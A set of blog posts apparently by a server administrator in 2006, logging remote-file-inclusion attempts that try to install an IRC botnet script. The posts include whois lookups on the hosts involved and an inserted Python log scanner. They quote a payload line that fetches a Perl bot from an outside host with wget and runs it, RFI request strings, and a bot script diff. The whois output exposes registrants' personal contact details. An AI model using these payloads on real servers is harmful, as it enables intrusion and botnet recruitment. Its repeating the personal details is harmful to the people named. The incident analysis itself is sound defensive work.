Tag Archives: IRC botnet

script kiddies go home.

Yeesh, another day, another set of lame attacks. This hack attempt tries to use the BBCodeFile parameter. Like the first one from last week, it attempts to join an IRC botnet and tries to get files from the full-comandos.com website. The files it attempts to download also contain the following text. I’ve renamed the file extensions so accidents are less likely to happen with this code.

lol.gif.txt:@passthru('cd /tmp;wget http://jaheem.by.ru/tes.pl;perl tes.pljaheem;rm -tes.pl*');
...
r.gif.txt: $mhost = 'http://opersconexion.port5.com?';
r.gif.txt: $bt = 'http://www.full-comandos.com/jobing/r0nin';
r.gif.txt: $dc = 'http://www.full-comandos.com/jobing/dc.txt';
...
tes.pl.txt:$cmd="http://jaheem.by.ru/r.gif?";
...
#ANTICLONE 1337 :p
...
# MORGAN OWNED YOUR BOX
# www.FST-Production
# irc.gigachat.net - #Morgan

Well, this is enough boredom for me, for now.

attack log

px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:53 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:04 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:06 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:08 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:06 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:08 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:10 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:48 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:49 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:27 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:29 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:30 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:31 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.

CIA currently under attack.

Well, as an update to that lame hack attempt from last week, here are the logs of a continuing attack, which is still going on at this time. I would look into it further, but I have a huge headache, and my ability to sit upright at the moment is painful. I reported the last incident to the appropriate parties, including Tucows, without any reply. Maybe I will attempt to report this one, but doubtfully anyone will listen again.
It appears to be the same botnet script from looking at the URL it wants to grab.
This is just plain annoying.

[update]
OK, so I couldn’t help myself and downloaded the scripts, and lo and behold, they are attempting to DDoS the cia.gov website. The files they attempt to retrieve do not exist, of course, and instead redirect to:
https://www.cia.gov/redirects/ciaredirect.html

$ diff borek.txt ../2006.12.25/borek.txt 
13c13
< my $sPort      = '7778';
---
> my $sPort      = '6667';
23c23
< open(LOCK, '>/tmp/sess_ter8c25f563ff894083bf9db1011bde6') or die;
---
> open(LOCK, '>/tmp/sess_et12c22f5t4fg872r83bf9db1e11bde6') or die;
203,205c203,205
< my $bPath = '/tmp/sess_66f0ef45beea164fc15fd24d1e9d7311';
<     my $rfi   = 'http://cia.gov/czap.txt';
<     my $bLoc = 'http://cia.gov/barek.txt';
---
>     my $bPath = '/tmp/sess_65e12f31e32a36ufc15fd24d1e9d7311';
>     my $rfi   = 'http://webstorch.com/cap.txt';
>     my $bLoc = 'http://webstorch.com/borek.txt';


lame xss hack attempt.

I just happened to catch this in my logs. It almost seems like they thought I was using Tucows blogware hosting. Hmm. But I use WordPress. Oh well, it’s Christmas, I’m bored as fuck, so here is the nitty gritty that I can figure out.

==> /var/log/apache2/fwd.ns1.net_access_log <==
fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:10 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.

==> /var/log/apache2/px.ns1.net_access_log <==
px.ns1.net besthost5.com - - [25/Dec/2006:05:55:11 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.

==> /var/log/apache2/fwd.ns1.net_access_log <==
fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.

==> /var/log/apache2/px.ns1.net_access_log <==
px.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.
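What the entries in this post and in the `BBCodeFile` attack log above have in common is a query-string parameter whose value is itself a remote URL, which is the signature of a remote file inclusion attempt. As an added example (my code, not anything from the original posts), here is a small Python scanner that pulls that pattern out of Apache access-log lines; the sample lines are constructed after the entries quoted above, and the function names are my own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines modelled on the entries quoted in the posts above
# (vhost, client, ident, user, timestamp, request, status, bytes, referer, UA).
SAMPLE_LOG = """\
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803"
px.ns1.net besthost5.com - - [25/Dec/2006:05:55:11 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64"
px.ns1.net 192.0.2.10 - - [31/Dec/2006:08:01:12 -0700] "GET /tags.php?BBCodeFile=default&feed=rss2 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) .*?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"')
REMOTE_URL = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly: the second entry above arrives with [ ] and ? encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi(line):
    """Return a finding dict if any query parameter value is a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')  # not urlsplit: '//' paths parse as hosts
    hits = [(decode_fully(k), decode_fully(v))
            for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(decode_fully(v))]
    if not hits:
        return None
    return {'client': m.group('client'), 'time': m.group('ts'), 'status': m.group('status'),
            'ua': m.group('ua'), 'path': path, 'params': hits}

def scan(log_text):
    """Scan whole log text; returns one finding per suspicious request line."""
    return [f for f in map(find_rfi, log_text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['status']} {f['path']} {f['params']} ua={f['ua']}")
```

A 404 on the included script, as in every entry above, means the request never reached a vulnerable include; the finding is still worth keeping for the abuse report, since the client and the hosting URL are exactly what the registrar and upstream provider need.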

If the request had worked, it would have downloaded the file “c.in”, which then tries to embed itself into the server. The request came from an IP address in Bangkok, Thailand: 203.146.140.221

The file this hack attempt wanted me to download would have been from a domain registered in Rio de Janeiro, Brazil, although the IP address appears to be registered to Internap in San Jose: 64.74.223.4

At the end of the script it attempts to download this next file:
http://www.husnaweb.com/cmd2.txt
which then attempts to download
http://www.husnaweb.com/borek.txt
I haven’t seen a script kiddie who can spell and use proper grammar, but still, the header of this file contains a harsh but rather true statement.

omg your box got owned. secure ur shit better. if you dont know how, why are you admin of this box?

The rest of the file is an IRC bot, for use in, well, a zombie IRC botnet for whatever ill purposes they choose.

Request: besthost5.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.59.74:43] ... 
connected to whois.dotregistrar.com [209.67.69.25:43] ... 
This whois service shows the information for .COM and .NET domains 
only if they are registered thru DotRegistrar.com. For ORG, .BIZ, .US .INFO and
.NAME domains, the information is displayed regardless of the sponsoring
registrar for said domains.
 
The fact that your query returns "NOT FOUND" does not necessarily mean that
the domain may be available for registration. To search all domains, please
go to the shared registry whois located at:
http://www.internic.net/whois.html
 
 
Registrant:
   Nopparat Thong (BESTHOST5-COM-DOM)
   BEST HOST
   94/7 Bangchanglow
   Bangkok, Bangkok 10700
   THAILAND
   (662) 8665400
   (662) 4112082
   nopbk@hotmail.com
 
   Domain Name: BESTHOST5.COM
   Status: PROTECTED
 
   Administrative Contact:
      Nopparat Thong nopbk@hotmail.com
      94/7 Bangchanglow
      Bangkok, Bangkok 10700
      THAILAND
      (662) 8665400
      Fax- (662) 4112082
 
   Technical Contact, Zone Contact:
      Nopparat Thong nopbk@hotmail.com
      94/7 Bangchanglow
      Bangkok, Bangkok 10700
      THAILAND
      (662) 8665400
      Fax- (662) 4112082
 
   Record last updated on 03-Jul-2006.
   Record expires on 02-Jun-2007.
   Record created on 02-Jun-2005.
 
   Domain servers in listed order:
 
   Name Server: ns1.besthost5.com
   Name Server: ns2.besthost5.com
 
connected to whois.apnic.net [202.12.29.13:43] ... 
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html
 
inetnum:      203.146.140.192 - 203.146.140.255
netname:      csloxinfoidc-th
country:      TH
descr:        reassign to "CSLOXINFO IDC "
descr:        contact "vareepon@csloxinfo.net"
admin-c:      LIA1-AP
tech-c:       LIA1-AP
status:       ASSIGNED NON-PORTABLE
changed:      domaster@loxinfo.co.th 20050309
mnt-by:       LOXINFO-IS
source:       APNIC
 
role:         Loxinfo IP Admins
address:      304 Suapah Rd, Pomprab
address:      Pomprab Suttruphai,Bangkok
country:      TH
phone:        +662 6225678
fax-no:       +662 6228380
e-mail:       domaster@loxinfo.co.th
admin-c:      DL85-AP
tech-c:       DL85-AP
nic-hdl:      LIA1-AP
mnt-by:       LOXINFO-IS
changed:      ip_admin@csloxinfo.net 20060703
source:       APNIC
Request: 208.101.16.120
connected to whois.arin.net [192.149.252.44:43] ... 
connected to rwhois.softlayer.com [66.228.118.81:4321] ... 
%rwhois V-1.5:003fff:00 rwhois.softlayer.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-SOFTLAYER.208.101.0.0/18
network:Auth-Area:208.101.0.0/18
network:Network-Name:SOFTLAYER-208.101.0.0
network:IP-Network:208.101.16.120/29
network:IP-Network-Block:208.101.16.120-208.101.16.127
network:Organization;I:BaseRunner Net Services
network:Street-Address:9 Brian Drive
network:City:Rochester
network:State:NY
network:Postal-Code:14624-3603
network:Country-Code:US
network:Tech-Contact;I:sysadmins@softlayer.com
network:Abuse-Contact;I:abuse@softlayer.com
network:Admin-Contact;I:IPADM258-ARIN
network:Created:20060315
network:Updated:20060315
network:Updated-By:ipadmin@softlayer.com
 
Registrant:
   Husna Ahmad
   1691 South Ave
   Rochester, New York 14620
   United States
 
   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: HUSNAWEB.COM
      Created on: 11-Jun-03
      Expires on: 11-Jun-07
      Last Updated on: 
 
   Administrative Contact:
      Ahmad, Husna  ahmad_husna@yahoo.com
      1691 South Ave
      Rochester, New York 14620
      United States
      585 507-2244
 
   Technical Contact:
      Ahmad, Husna  ahmad_husna@yahoo.com
      1691 South Ave
      Rochester, New York 14620
      United States
      585 507-2244
 
   Domain servers in listed order:
      NS1.BASERUNNER.NET
      NS2.BASERUNNER.NET
 
Request: 64.74.223.4
connected to whois.arin.net [192.149.252.44:43] ... 
Internap Network Services PNAP-SEA-BLOCK4 (NET-64-74-0-0-1) 
                                  64.74.0.0 - 64.74.255.255
eNom INAP-SJE-ENOM-3077 (NET-64-74-223-0-1) 
                                  64.74.223.0 - 64.74.223.255
 
Request: NET-64-74-223-0-1
connected to whois.arin.net [192.149.252.44:43] ... 
 
CustName:   eNom
Address:    2002 156th Ave NE
City:       Bellevue
StateProv:  WA
PostalCode: 98008
Country:    US
RegDate:    2005-09-23
Updated:    2005-09-23
 
NetRange:   64.74.223.0 - 64.74.223.255 
CIDR:       64.74.223.0/24 
NetName:    INAP-SJE-ENOM-3077
NetHandle:  NET-64-74-223-0-1
Parent:     NET-64-74-0-0-1
NetType:    Reassigned
Comment:    
RegDate:    2005-09-23
Updated:    2005-09-23
 
RTechHandle: INO3-ARIN
RTechName:   InterNap Network Operations Center 
RTechPhone:  +1-877-843-4662
RTechEmail:  noc@internap.com 
 
OrgAbuseHandle: IAC3-ARIN
OrgAbuseName:   Internap Abuse Contact 
OrgAbusePhone:  +1-206-256-9500
OrgAbuseEmail:  abuse@internap.com
 
OrgTechHandle: INO3-ARIN
OrgTechName:   InterNap Network Operations Center 
OrgTechPhone:  +1-877-843-4662
OrgTechEmail:  noc@internap.com
 
# ARIN WHOIS database, last updated 2006-12-24 19:10
 
Request: full-comandos.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.50.74:43] ... 
connected to whois.enom.com [72.5.232.19:43] ... 
Registration Service Provided By: Surpass Hosting
Contact: enom@surpasshosting.com
Visit: http://www.surpasshosting.com
 
Domain name: full-comandos.com
 
Registrant Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Administrative Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Technical Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Status: Locked
 
Name Servers:
   dns1.name-services.com
   dns2.name-services.com
   dns3.name-services.com
   dns4.name-services.com
   dns5.name-services.com
 
Creation date: 26 Nov 2005 14:14:08
Expiration date: 26 Nov 2006 14:14:08

The interesting thing about the previous domain: you will notice that it has been expired for almost an entire month.

Domain registrars should immediately terminate the domain registration and DNS records when this stuff is reported, but they don’t. If they actually bothered to just remove the DNS records from expired domains, that would help too.
